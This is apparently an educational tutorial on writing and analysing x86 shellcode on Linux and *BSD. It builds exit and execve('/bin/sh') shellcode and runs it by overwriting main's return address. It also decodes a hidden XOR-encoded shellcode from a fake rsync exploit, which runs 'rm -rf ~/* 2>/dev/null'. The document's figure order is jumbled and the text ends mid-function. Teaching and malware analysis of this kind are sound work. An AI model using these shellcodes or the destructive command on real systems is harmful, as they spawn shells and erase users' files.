read(3, "\177ELF[...]", 512)            = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=..., ...}) = 0
old_mmap(NULL, 1253956, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x40027000
old_mmap(0x4014f000, 32768, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0x127000) = 0x4014f000
old_mmap(0x40157000, 8772, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40157000
close(3)                                = 0
munmap(0x40018000, 60420)               = 0
_exit(0)                                = ?
$


Listing 9. Verifying the shellcode

$ nasm -f elf exit2.asm
$ objdump -d exit2.o

exit2.o:     file format elf32-i386

Disassembly of section .text:

00000000 <.text>:
   0:   31 db                   xor    %ebx,%ebx
   2:   b0 01                   mov    $0x1,%al
   4:   cd 80                   int    $0x80


Listing 10. The binary built from the previous exit.c listing and opened with gdb

$ gdb ./exit
GNU gdb 6.1-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-linux"...Using host libthread_db library "/lib/libthread_db.so.1".

(gdb) break main
Breakpoint 1 at 0x804836a
(gdb) run
Starting program: /ramdisk/var/tmp/exit

Breakpoint 1, 0x0804836a in main ()
(gdb) disas _exit
Dump of assembler code for function _exit:
0x400ced9c <_exit+0>:   mov    0x4(%esp),%ebx
0x400ceda0 <_exit+4>:   mov    $0xfc,%eax
0x400ceda5 <_exit+9>:   int    $0x80
0x400ceda7 <_exit+11>:  mov    $0x1,%eax
0x400cedac <_exit+16>:  int    $0x80
0x400cedae <_exit+18>:  hlt
0x400cedaf <_exit+19>:  nop
End of assembler dump.
(gdb)
We only have to compile it:

$ gcc -o exit exit.c

and disassemble it with gdb (http://www.gnu.org/software/gdb/) to make sure it executes the system call and see how it works under the hood: see Listing 3.

The last instruction in main() is the call to the exit(3) function. We will now see that exit(3), in turn, calls the _exit(2) function which will finally execute the system call, including the 0x80 interrupt: see Listing 4.

Therefore, a shellcode using the libc to indirectly execute the exit(2) system call looks like:

push dword 0        ; status
call 0x8048284      ; Call the libc exit() function (address obtained
                    ; from the above disassembly)
add esp, 4          ; Clean up the stack

*BSD system calls

In the *BSD family, direct system calls (i.e. through the 0x80 interrupt) are slightly different than in Linux, while there's no difference in indirect system calls (i.e. using the libc functions addresses).

The numbers of the syscalls are listed in the /usr/src/sys/kern/syscalls.master file, which also contains the prototypes of the syscall functions. Here are the first lines of the file on OpenBSD: see Listing 5.

The first column contains the system call number, the second contains the type of the system call and the third the prototype of the function. Unlike Linux, *BSD system calls don't use the fastcall convention (i.e. passing

Listing 11. Spawning a shell

$ man 2 execve
EXECVE(2)              Linux Programmer's Manual              EXECVE(2)

NAME
       execve - execute program

SYNOPSIS
       #include <unistd.h>

       int execve(const char *filename, char *const argv[], char *const envp[]);

DESCRIPTION
       execve() executes the program pointed to by filename.  filename must be
       either a binary executable, or a script starting with a line of the form
       "#! interpreter [arg]".  In the latter case, the interpreter must be a
       valid pathname for an executable which is not itself a script, which will be
       invoked as interpreter [arg] filename.

       argv is an array of argument strings passed to the new program.  envp is an
       array of strings, conventionally of the form key=value, which are passed
       as environment to the new program.  Both, argv and envp must be terminated by
       a null pointer.  The argument vector and environment can be accessed by
       the called program's main function, when it is defined as int main(int argc,
       char *argv[], char *envp[]).


Listing 12. The overall structure of the shellcode

jmp short mycall        ; Immediately jump to the call instruction
shellcode:
    pop esi             ; Store the address of "/bin/sh" in ESI
    [...]
mycall:
    call shellcode      ; Push the address of the next byte onto the stack: the next
                        ; byte is the beginning of the string "/bin/sh"
    db "/bin/sh"
arguments in registers), but use the C calling convention instead, pushing arguments on the stack. Arguments are pushed in reverse order (from right to left), so that they are extracted in the correct order by the function. Immediately after the system call returns, the stack needs to be cleaned up by adding to the stack pointer (ESP) a number equal to the size, in bytes, of the arguments (to put it simply, you have to add the number of arguments multiplied by 4).

The role of the EAX register, instead, remains the same: it must contain the syscall number and will eventually contain the return value. Therefore, to recap, executing a system call requires four steps:

• storing the syscall number in EAX;
• pushing (in reverse order) the arguments on the stack;
• executing the 0x80 software interrupt;
• cleaning up the stack.

The previous example for Linux now becomes on *BSD:

exit_BSD.asm

mov eax, 1          ; Syscall number
push dword 0        ; rval
push eax            ; Push one more dword (see below)
int 0x80            ; 0x80 interrupt
add esp, 8          ; Clean up the stack

As you can see, before executing the software interrupt, you need to push one extra dword on the stack (any dword will do); for an in-depth discussion on this topic, please refer to [FreeBSD] (http://www.int80h.org/bsdasm/#default-calling-convention).
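As an added example (not code from the article), the two syscall tables quoted above, the Linux unistd.h `#define __NR_...` lines and the three columns of the OpenBSD syscalls.master, parsed in Python so that a number seen next to an int 0x80 in a disassembly can be resolved to a name, and so that the stack clean-up a *BSD call needs can be derived from its prototype. The table excerpts are constructed from Listings 1 and 5; the execve (11) and exit_group (252) entries carry the numbers the article quotes later on, and the function names are mine.

```python
"""Resolve syscall numbers from the Linux and OpenBSD tables quoted above.

Added example, not code from the article. The two excerpts below are
constructed from Listings 1 and 5; execve (11) and exit_group (252) are
added with the numbers the article quotes later on.
"""
import re

LINUX_UNISTD_H = """\
#ifndef _ASM_I386_UNISTD_H_
#define _ASM_I386_UNISTD_H_
#define __NR_exit                 1
#define __NR_fork                 2
#define __NR_read                 3
#define __NR_write                4
#define __NR_open                 5
#define __NR_close                6
#define __NR_waitpid              7
#define __NR_creat                8
#define __NR_execve              11
#define __NR_exit_group         252
"""

OPENBSD_SYSCALLS_MASTER = """\
; number  type      prototype (continuation lines end with a backslash)
1       STD             { void sys_exit(int rval); }
2       STD             { int sys_fork(void); }
3       STD             { ssize_t sys_read(int fd, void *buf, \\
                            size_t nbyte); }
4       STD             { ssize_t sys_write(int fd, const void *buf, \\
                            size_t nbyte); }
5       STD             { int sys_open(const char *path, \\
                            int flags, ... mode_t mode); }
6       STD             { int sys_close(int fd); }
7       STD             { pid_t sys_wait4(int pid, int *status, int options, \\
                            struct rusage *rusage); } wait4
8       COMPAT_43       { int sys_creat(const char *path, mode_t mode); } ocreat
"""

# Linux int 0x80 convention: number in EAX, arguments in these registers.
LINUX_ARG_REGS = ["EBX", "ECX", "EDX", "ESI", "EDI", "EBP"]


def parse_linux_unistd(text):
    """Map syscall number -> name from '#define __NR_<name> <number>' lines."""
    return {int(num): name
            for name, num in re.findall(r"^#define\s+__NR_(\w+)\s+(\d+)", text, re.M)}


def _join_continuations(text):
    """Rejoin prototype lines that syscalls.master splits with a trailing backslash."""
    lines, pending = [], ""
    for line in text.splitlines():
        if line.rstrip().endswith("\\"):
            pending += line.rstrip()[:-1] + " "
        else:
            lines.append(pending + line)
            pending = ""
    return lines


def parse_bsd_syscalls_master(text):
    """Map number -> (type, name, argument count) from syscalls.master.

    Column 1 is the number, column 2 the type (STD, COMPAT_43, ...) and
    column 3 the C prototype, from which the argument count is taken.
    """
    table = {}
    for line in _join_continuations(text):
        m = re.match(r"^(\d+)\s+(\S+)\s+\{[^(]*\bsys_(\w+)\s*\(([^)]*)\)", line)
        if m:
            params = m.group(4).strip()
            nargs = 0 if params in ("", "void") else len(params.split(","))
            table[int(m.group(1))] = (m.group(2), m.group(3), nargs)
    return table


def linux_arg_registers(nargs):
    """Registers carrying the arguments on Linux; with more than six, a
    pointer to a structure holding them is passed in EBX instead."""
    return LINUX_ARG_REGS[:nargs] if nargs <= 6 else ["EBX"]


def bsd_stack_cleanup(number, table):
    """Bytes to add to ESP after a *BSD int 0x80: one dword per argument
    plus the extra dword pushed before the interrupt (see exit_BSD.asm)."""
    nargs = table[number][2]
    return 4 * (nargs + 1)


if __name__ == "__main__":
    linux = parse_linux_unistd(LINUX_UNISTD_H)
    bsd = parse_bsd_syscalls_master(OPENBSD_SYSCALLS_MASTER)
    print("Linux   11 ->", linux[11], "args in", linux_arg_registers(3))
    print("OpenBSD  1 ->", bsd[1], "then add esp,", bsd_stack_cleanup(1, bsd))
```

For exit on OpenBSD the clean-up comes out as 8, the `add esp, 8` of exit_BSD.asm above (one argument plus the extra dword); fed the real files instead of the excerpts, the same two parsers give the complete tables.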


Writing the shellcode

The next examples refer to Linux, but can be easily adapted to the *BSD world.

So far, we have seen how to execute simple commands using system calls. To obtain our shellcode, now, we only have to get the opcodes corresponding to the assembler instructions. There are typically three methods to get the opcodes:

• writing them manually in hex (with the Intel® documentation at hand!),
• writing the assembly code and then extracting the opcodes,
• writing the C code and disassembling it.

Listing 13. Resulting assembly code

get_shell.asm

jmp short mycall            ; Immediately jump to the call instruction
shellcode:
    pop esi                 ; Store the address of "/bin/sh" in ESI
    xor eax, eax            ; Zero out EAX
    mov byte [esi + 7], al  ; Write the null byte at the end of the string
    mov dword [esi + 8], esi    ; [ESI+8], i.e. the memory immediately below the string
                                ; "/bin/sh", will contain the array pointed to by the
                                ; second argument of execve(2); therefore we store in
                                ; [ESI+8] the address of the string...
    mov dword [esi + 12], eax   ; ...and in [ESI+12] the NULL pointer (EAX is 0)
    mov al, 0x0b            ; Store the number of the syscall (11) in EAX
    lea ebx, [esi]          ; Copy the address of the string in EBX
    lea ecx, [esi + 8]      ; Second argument to execve(2)
    lea edx, [esi + 12]     ; Third argument to execve(2) (NULL pointer)
    int 0x80                ; Execute the system call
mycall:
    call shellcode          ; Push the address of "/bin/sh" onto the stack
    db "/bin/sh"
I don't think this is the right place to talk about ModRM and SIB bytes, memory addressing and so on. So we won't delve here into writing hand-crafted machine code; anyway, you can find all the information you want (and probably more) in [Intel] (http://developer.intel.com/design/pentium4/manuals/index_new.htm). So let's take a look now at the other two methods.


In assembler

The second method is by far the most efficient and widespread, though we will see that all methods lead to the same results. Our first step will be to use the assembly code from the previous exit.asm example to write a shellcode that, using the exit(2) syscall, will make the application exit cleanly. To get the opcodes, we will first assemble the code with nasm (http://nasm.sourceforge.net/) and then disassemble the freshly built binary with objdump: see Listing 6.

The second column contains the opcodes we need. Therefore, we can write our first shellcode and test it with a very simple C program borrowed from [Phrack] (http://www.phrack.org/show.php?p=49&a=14): see Listing 7.

Though very popular, the above lines may not be that straightforward. Anyway, they simply overwrite the return address of the main() function with the address of the shellcode, in order to execute the shellcode instructions upon exit from main(). After the first declaration, the stack will look like:

• Return address   ← Return address (pushed by the call instruction) to store in EIP upon exit
• Saved EBP        ← Saved EBP (to be restored upon exit from the function)
• ret              ← First local variable of the main() function

The second instruction increments the address of the ret variable by 8 bytes (2 dwords) to obtain the address of the return address, i.e. the pointer to the first instruction which will be executed upon exit from the main() function. Finally, the third instruction overwrites this address with the address of the shellcode. At this point, the program exits from the main() function, restores EBP, stores the address of the shellcode in EIP and executes it.

To see all this in operation, we just have to compile sc_exit.c and run it:


Listing 14. Extracting the opcodes

$ nasm -f elf get_shell.asm
$ objdump -d get_shell.o

get_shell.o:     file format elf32-i386

Disassembly of section .text:

00000000 <shellcode-0x2>:
   0:   eb 18                   jmp    1a <mycall>

00000002 <shellcode>:
   2:   5e                      pop    %esi
   3:   31 c0                   xor    %eax,%eax
   5:   88 46 07                mov    %al,0x7(%esi)
   8:   89 76 08                mov    %esi,0x8(%esi)
   b:   89 46 0c                mov    %eax,0xc(%esi)
   e:   b0 0b                   mov    $0xb,%al
  10:   8d 1e                   lea    (%esi),%ebx
  12:   8d 4e 08                lea    0x8(%esi),%ecx
  15:   8d 56 0c                lea    0xc(%esi),%edx
  18:   cd 80                   int    $0x80

0000001a <mycall>:
  1a:   e8 e3 ff ff ff          call   2 <shellcode>
  1f:   2f                      das
  20:   62 69 6e                bound  %ebp,0x6e(%ecx)
  23:   2f                      das
  24:   73 68                   jae    8e <mycall+0x74>
$


Listing 15. Inserting the opcodes in the C program

get_shell.c

/* Opcodes taken from the objdump output of Listing 14 */
char shellcode[] = "\xeb\x18\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46"
                   "\x0c\xb0\x0b\x8d\x1e\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
                   "\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

int main()
{
    int *ret;
    /* Point two dwords above the local variable: the saved return address */
    ret = (int *)&ret + 2;
    /* Overwrite it so that main() "returns" into the shellcode */
    (*ret) = (int) shellcode;
}
$ gcc -o sc_exit sc_exit.c
$ ./sc_exit
$

Let me guess: your mouth is not really wide open in amazement! Anyway, if we want to make sure it has really been our shellcode to make the program exit, we can verify it with strace (http://www.sourceforge.net/projects/strace/): see Listing 8.

On the last line, you can notice our exit(2) system call. Unfortunately, looking at the shellcode, we can notice a little problem: it contains a lot of null bytes and, since the


Listing 16. Disassembling with ndisasm

$ echo -ne "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"\
> "\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e"\
> "\x2f\x73\x68\x58" | ndisasm -u -

00000000  EB17              jmp short 0x19      ; Initial jump to the CALL
00000002  5E                pop esi             ; Store the address of the string in ESI
00000003  897608            mov [esi+0x8],esi   ; Write the address of the string in ESI+8
00000006  31C0              xor eax,eax         ; Zero out EAX
00000008  884607            mov [esi+0x7],al    ; Null-terminate the string
0000000B  89460C            mov [esi+0xc],eax   ; Write the null pointer to ESI+12
0000000E  B00B              mov al,0xb          ; Number of the execve(2) syscall
00000010  89F3              mov ebx,esi         ; Store the address of the string in EBX (first argument)
00000012  8D4E08            lea ecx,[esi+0x8]   ; Second argument (pointer to the array)
00000015  31D2              xor edx,edx         ; Zero out EDX (third argument)
00000017  CD80              int 0x80            ; Execute the syscall
00000019  E8E4FFFFFF        call 0x2            ; Push the address of the string and jump to the second instruction
0000001E  2F                das                 ; "/bin/shX"
0000001F  62696E            bound ebp,[ecx+0x6e]
00000022  2F                das
00000023  7368              jnc 0x8d
00000025  58                pop eax
$


Listing 17. The less visible shellcode

[...]

char shellcode2[] =
"\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9"
"\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99"
"\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81"
"\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb"
"\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf"
"\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7"
"\x7b\x35";

[...]
shellcode is often written into a string buffer, those bytes will be treated as string terminators by the application and the attack will fail. There are two ways to get around this problem:

• writing instructions that don't contain null bytes (not always possible),
• writing a self-modifying shellcode (without null bytes) which will write the necessary null bytes (e.g. string terminators) at run-time.

We will now apply the first method, while we will implement the second later.

First, the first instruction (mov ebx, 0) can be replaced by the more common (for performance reasons):

xor ebx, ebx

The second instruction, instead, contained all those zeroes because we were using a 32 bit register (EAX), thus making 0x01 become 0x01000000 (bytes are in reverse order because Intel® processors are little endian). Therefore, we can solve this problem simply using an 8 bit register (AL) instead of a 32 bit register:

mov al, 1
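An added example, not code from the article (which does this step by eye on the objdump output): a Python parser for the `objdump -d` format of Listings 6 and 9 that rebuilds the opcode bytes from the second column and reports which instructions carry the null bytes discussed above, so the little-endian immediate is visible instruction by instruction. The two objdump excerpts are the article's outputs for exit.o and exit2.o, embedded as constructed sample input; the function names are mine.

```python
"""Parse 'objdump -d' output and locate null bytes in the opcodes.

Added example, not code from the article. The two excerpts are the
objdump outputs shown in Listings 6 (exit.o) and 9 (exit2.o), embedded
here as constructed sample input.
"""
import re

OBJDUMP_EXIT = """\
exit.o:     file format elf32-i386

Disassembly of section .text:

00000000 <.text>:
   0:   bb 00 00 00 00          mov    $0x0,%ebx
   5:   b8 01 00 00 00          mov    $0x1,%eax
   a:   cd 80                   int    $0x80
"""

OBJDUMP_EXIT2 = """\
exit2.o:     file format elf32-i386

Disassembly of section .text:

00000000 <.text>:
   0:   31 db                   xor    %ebx,%ebx
   2:   b0 01                   mov    $0x1,%al
   4:   cd 80                   int    $0x80
"""

# One instruction line: "<hex offset>:  <hex bytes>  <mnemonic and operands>"
INSN_RE = re.compile(r"^\s*([0-9a-f]+):\s+((?:[0-9a-f]{2}\s+)+)(\S.*)?$")


def parse_objdump(text):
    """Return (offset, opcode bytes, normalised assembly text) per instruction."""
    insns = []
    for line in text.splitlines():
        m = INSN_RE.match(line)
        if not m:          # file header, section header, symbol lines, blanks
            continue
        offset = int(m.group(1), 16)
        opcodes = bytes.fromhex(m.group(2).replace(" ", "").replace("\t", ""))
        asm = " ".join((m.group(3) or "").split())
        insns.append((offset, opcodes, asm))
    return insns


def opcode_bytes(insns):
    """Concatenate the second column: the raw opcodes of the listing."""
    return b"".join(op for _, op, _ in insns)


def null_byte_report(insns):
    """Map each instruction containing 0x00 to the offsets of those bytes.

    A 32-bit immediate such as mov $0x1,%eax is stored little-endian as
    01 00 00 00, which is where the zeros in Listing 6 come from.
    """
    return {asm: [off + i for i, b in enumerate(op) if b == 0]
            for off, op, asm in insns if 0 in op}


if __name__ == "__main__":
    for text in (OBJDUMP_EXIT, OBJDUMP_EXIT2):
        insns = parse_objdump(text)
        print(opcode_bytes(insns).hex(), null_byte_report(insns))
```

Run on Listing 6 the report names both mov instructions with their zero offsets; on Listing 9 it is empty, which is the check the text performs by inspection.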


Listing 18. Disassembling the shellcode

$ echo -ne "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8[...]" | \
> ndisasm -u -
00000000  EB10          jmp short 0x12      ; Jump to the CALL
00000002  5E            pop esi             ; Retrieve the address of byte 0x17
00000003  31C9          xor ecx,ecx         ; Zero out ECX
00000005  B14B          mov cl,0x4b         ; Setup the loop counter (see the loop at 0x0E)
00000007  B0FF          mov al,0xff         ; Setup the XOR mask
00000009  3006          xor [esi],al        ; XOR byte 0x17 with AL
0000000B  FEC8          dec al              ; Decrease the XOR mask
0000000D  46            inc esi             ; Load the address of the next byte
0000000E  E2F9          loop 0x9            ; Keep XORing until ECX=0
00000010  EB05          jmp short 0x17      ; Jump to the first XORed instruction
00000012  E8EBFFFFFF    call 0x2            ; PUSH the address of the next byte and
                                            ; jump to the second instruction
[...]


Listing 19. Decoding the shellcode using python

decode.py

#!/usr/bin/env python3
import sys

# The shellcode of Listing 17
sc = (
    b"\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9"
    b"\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99"
    b"\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81"
    b"\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb"
    b"\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf"
    b"\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7"
    b"\x7b\x35"
)

# Bytes from offset 0x17 onwards are XORed with 0xff, 0xfe, ... (one less per byte);
# write the decoded bytes raw so they can be piped to hexdump or ndisasm
sys.stdout.buffer.write(bytes(b ^ (0xff - i) for i, b in enumerate(sc[0x17:])))


Now our assembly code looks like:

exit2.asm

xor ebx, ebx        ; Status
mov al, 1           ; Number of the exit(2) syscall
int 0x80            ; Interrupt 0x80

and the shellcode becomes: see Listing 9, which, as you can see, doesn't contain any null bytes!


In C

Now let's take a look at the other technique to extract the opcodes: writing the program in C and disassembling it. Let's consider, for instance, the binary built from the previous exit.c listing and open it with gdb (http://www.gnu.org/software/gdb/): see Listing 10.

As you can see, the function actually executes two syscalls: first number 0xfc (252), exit_group(2), and then number 1, exit(2). The exit_group(2) syscall is similar to exit(2) but has the purpose to terminate all threads in the current thread group.

Anyway, only the second syscall is required by our shellcode. So let's extract the opcodes with gdb (http://www.gnu.org/software/gdb/):

(gdb) x/4bx _exit
0x400ced9c <_exit>:     0x8b    0x5c    0x24    0x04
(gdb) x/7bx _exit+11
0x400ceda7 <_exit+11>:  0xb8    0x01    0x00    0x00    0x00    0xcd    0x80
(gdb)

Once again, to make the shellcode work in real-world applications, we will need to remove all those null bytes!


Listing 20. Decoding the shellcode using python

$ ./decode.py | hexdump -C
00000000  e8 25 00 00 00 2f 62 69  6e 2f 73 68 00 73 68 00  |.%.../bin/sh.sh.|
00000010  2d 63 00 72 6d 20 2d 72  66 20 7e 2f 2a 20 32 3e  |-c.rm -rf ~/* 2>|
00000020  2f 64 65 76 2f 6e 75 6c  6c 00 5d 31 c0 50 8d 5d  |/dev/null.]1.P.]|
00000030  0e 53 8d 5d 0b 53 8d 5d  08 53 89 eb 89 e1 31 d2  |.S.].S.].S....1.|
00000040  b0 0b cd 80 89 c3 31 c0  40 cd 80                 |......1.@..|
0000004b


Listing 21. Disassembling the decoded shellcode

$ ./decode.py | ndisasm -u -
00000000  E825000000        call 0x2a
00000005  2F                das
00000006  62696E            bound ebp,[ecx+0x6e]
00000009  2F                das
0000000A  7368              jnc 0x74
0000000C  007368            add [ebx+0x68],dh
0000000F  002D6300726D      add [0x6d720063],ch
00000015  202D7266207E      and [0x7e206672],ch
0000001B  2F                das
0000001C  2A20              sub ah,[eax]
0000001E  3238              xor bh,[eax]
00000020  2F                das
00000021  6465762F          gs jna 0x54
00000025  6E                outsb
00000026  756C              jnz 0x94
00000028  6C                insb
00000029  005D31            add [ebp+0x31],bl
[...]


Spawning a shell

Now it's time to write a shellcode to do something a little more useful. For instance, we can write a shellcode to spawn a shell (/bin/sh) and eventually exit cleanly. The simplest way to spawn a shell is using the execve(2) syscall. Let's take a look at its usage from its man page: see Listing 11.

To recap, we need to pass it three arguments:

• a pointer to the name of the program to execute (in our case a pointer to the string /bin/sh);
• a pointer to an array of strings to pass as arguments to the program (the first argument must be argv[0], i.e. the name of the program itself). The last element of the array must be a null pointer;
• a pointer to an array of strings to pass as environment to the program. These strings are usually in the form key=value and the last element must be a null pointer.

Therefore, spawning a shell from a C program looks like:
get_shell.c

#include <unistd.h>

int main()
{
    char *args[2];

    args[0] = "/bin/sh";
    args[1] = NULL;
    execve(args[0], args, NULL);
}

In the above example we passed to execve(2):

• a pointer to the string /bin/sh;
• an array of two pointers (the first pointing to the string /bin/sh and the second null);
• a null pointer (we don't need any environment variables).

Now let's build it and see it work:

$ gcc -o get_shell get_shell.c
$ ./get_shell
sh-2.05b$ exit
$

Ok, we got our shell! Now let's see how to use this system call in assembler (since there are only three arguments, we can use registers). We immediately have to tackle two problems:

• the first is a well-known problem: we can't insert null bytes in the shellcode; but this time we can't help

Listing 22. The beginning of the shellcode could be re-written this way

E825000000                                      call 0x2a
2F62696E2F736800                                db "/bin/sh", 0
736800                                          db "sh", 0
2D6300                                          db "-c", 0
726D202D7266207E2F2A20323E2F6465762F6E756C6C00  db "rm -rf ~/* 2>/dev/null", 0
5D                                              pop ebp
[...]


Listing 23. Examining the called function

$ ./decode.py | cut -c 43- | ndisasm -u -
00000000  5D            pop ebp             ; Retrieve the address of the string "/bin/sh"
00000001  31C0          xor eax,eax         ; Zero out EAX
00000003  50            push eax            ; Push the null pointer onto the stack
00000004  8D5D0E        lea ebx,[ebp+0xe]   ; Store the address of "rm -rf ~/* 2>/dev/null" in EBX
00000007  53            push ebx            ; Push it on the stack
00000008  8D5D0B        lea ebx,[ebp+0xb]   ; Store the address of "-c" in EBX
0000000B  53            push ebx            ; Push it on the stack
0000000C  8D5D08        lea ebx,[ebp+0x8]   ; Store the address of "sh" in EBX
0000000F  53            push ebx            ; Push it on the stack
00000010  89EB          mov ebx,ebp         ; Store the address of "/bin/sh" in EBX (first arg to execve())
00000012  89E1          mov ecx,esp         ; Store the stack pointer in ECX (ESP points to
                                            ; {"sh", "-c", "rm -rf ~/* 2>/dev/null", NULL})
00000014  31D2          xor edx,edx         ; Third arg to execve()
00000016  B00B          mov al,0xb          ; Number of the execve() syscall
00000018  CD80          int 0x80            ; Execute the syscall
0000001A  89C3          mov ebx,eax         ; Store 0xb in EBX (exit code=11)
0000001C  31C0          xor eax,eax         ; EAX=0
0000001E  40            inc eax             ; EAX=1 (number of the exit() syscall)
0000001F  CD80          int 0x80            ; Execute the syscall
using them: for instance, the shellcode must contain the string /bin/sh and, in C, strings must be null-terminated. And we will even have to pass two null pointers among the arguments to execve(2)!

• the second problem is finding the address of the string. Absolute memory addressing makes development much longer and harder, but, above all, it makes it almost impossible to port the shellcode among different programs and distributions.

To solve the first problem, we will make our shellcode able to put the null bytes in the right places at run-time. To solve the second problem, instead, we will use relative memory addressing.

The classic method to retrieve the address of the shellcode is to begin with a call instruction. The first thing a call instruction does is, in fact, pushing the address of the next byte onto the stack (to allow the RET instruction to insert this address in EIP upon return
from the called function); then the execution jumps to the address specified by the parameter of the call instruction. This way we have obtained our starting point: the address of the first byte after the call is the last value on the stack and we can easily retrieve it with a pop instruction!

Therefore, the overall structure of the shellcode will be: see Listing 12. Let's see what it does:

• first of all, the shellcode jumps to the call instruction;
• the call pushes onto the stack the address of the string /bin/sh (not null-terminated yet); db is a directive (not an instruction) that simply defines (i.e. reserves and initializes) a sequence of bytes;
• now the execution jumps back to the beginning of the shellcode;
• next, the address of the string is popped from the stack and stored in ESI. From now on, we will be able to refer to memory addresses with reference to the address of the string.

Now we can fill the structure of the shellcode with something useful. Let's see, step by step, what it will have to do:

• zero out EAX in order to have some null bytes available;
• terminate the string with a null byte, copying it from EAX (we will use the AL register);
• setup the array ECX will have to point to; it will be made up of the address of the string and a null pointer. We will accomplish this by writing the address of the string (stored in ESI) in the first free bytes right below the string, followed by the null pointer (once again we will use the zeroes in EAX);
• store the number of the syscall (0x0b) in EAX;
• store the first argument to execve(2) (i.e. the address of the string, saved in ESI) in EBX;
• store the address of the array in ECX (ESI+8);
• store the address of the null pointer in EDX (ESI+12);
• execute the interrupt 0x80.

This is the resulting assembly code: see Listing 13. Now let's extract the opcodes: see Listing 14, insert them in the C program: see Listing 15, and test it:

$ gcc -o get_shell get_shell.c
$ ./get_shell
sh-2.05b$ exit
$


Shellcode analysis 

One last point that deserves attention is the importance of 
disassembling shellcodes, both to learn new techniques 
and to be sure about what they do before executing 
them. 


Trust is good... 

For instance, let's take a look at the shellcode from the exploit (http://www.securityfocus.com/bid/12268/info/) made available by Rafael San Miguel Carrasco, exploiting a local buffer overflow vulnerability of the Exim (http://www.exim.org/) MTA (releases 4.40 through 4.43).


static char shellcode[] =
    "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
    "\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e"
    "\x2f\x73\x68";


Let's disassemble it with ndisasm; by now, we expect to see something familiar: see Listing 16.


...but control is better 

It's always a good habit to examine a shellcode before executing it. For example, on 28 May 2004, a prankster posted (http://www.seclists.org/lists/fulldisclosure/2004/May/1395.html) on full-disclosure (http://lists.netsys.com/mailman/listinfo/full-disclosure) what he asserted was a public exploit for an rsync (http://www.samba.org/rsync/) vulnerability. However, the code was weird: after a first, well-commented shellcode, there was a second, less visible shellcode: see Listing 17.

On top of that, after a brief look at the main() of the exploit, it was easy to spot that the latter shellcode was executed locally:

(long) funct = &shellcode2;
...
funct();


Therefore, if we want to know what the shellcode actually does, we can do nothing but disassemble it: see Listing 18.

As you can see, it's a self-modifying shellcode: instructions from 0x17 to 0x17 + 0x4B are decoded at run-time by XORing them with the value of al (which is initially 0xFF and then decreases at each loop iteration). Once decoded, the instructions are executed (jmp short 0x17). So let's try to understand which instructions will actually be executed. We can easily decode the shellcode using our beloved Python (http://www.python.org/): see Listing 19.

hexdump can already give us a first idea: see Listing 20.

Mmmh... /bin/sh, sh, -c, rm -rf ~/* 2>/dev/null... This doesn't look good... But let's disassemble it to be sure (see Listing 21).

The first instruction is a call, immediately followed by the strings displayed by hexdump. The beginning of the shellcode could be re-written this way: see Listing 22.

Let's examine the called function, keeping only the opcodes starting at the instruction 0x2a (42): see Listing 23.

As you can see, it's an execve(2) syscall with the array sh, -c, rm -rf ~/* 2>/dev/null as the second argument. Needless to repeat that you should always analyse a shellcode before executing it!
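The checks a practitioner runs on a blob before reaching for the disassembler, as an added Python example that is not part of the original article or its listings: a NUL-byte scan (a NUL would truncate the payload in a strcpy()-style overflow), the printable-string pass that hexdump gives you by eye, and a model of the rolling-XOR decoder described above (key starting at 0xFF, decremented after every byte). The shellcode bytes are the execve("/bin/sh") ones quoted above; the 0x90 padding used to stand in for a 0x17-byte decoder stub is a constructed placeholder, not the prankster's real code.

```python
"""Static checks on a shellcode blob before it is ever executed."""

# The execve("/bin/sh") shellcode quoted above (37 bytes).
SHELLCODE = (
    b"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
    b"\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e"
    b"\x2f\x73\x68"
)


def null_byte_offsets(code):
    """Offsets of NUL bytes. A strcpy()-style overflow stops copying at the
    first one, so a usable payload must report none."""
    return [i for i, b in enumerate(code) if b == 0]


def printable_strings(code, min_len=4):
    """(offset, text) for each run of at least min_len printable ASCII bytes:
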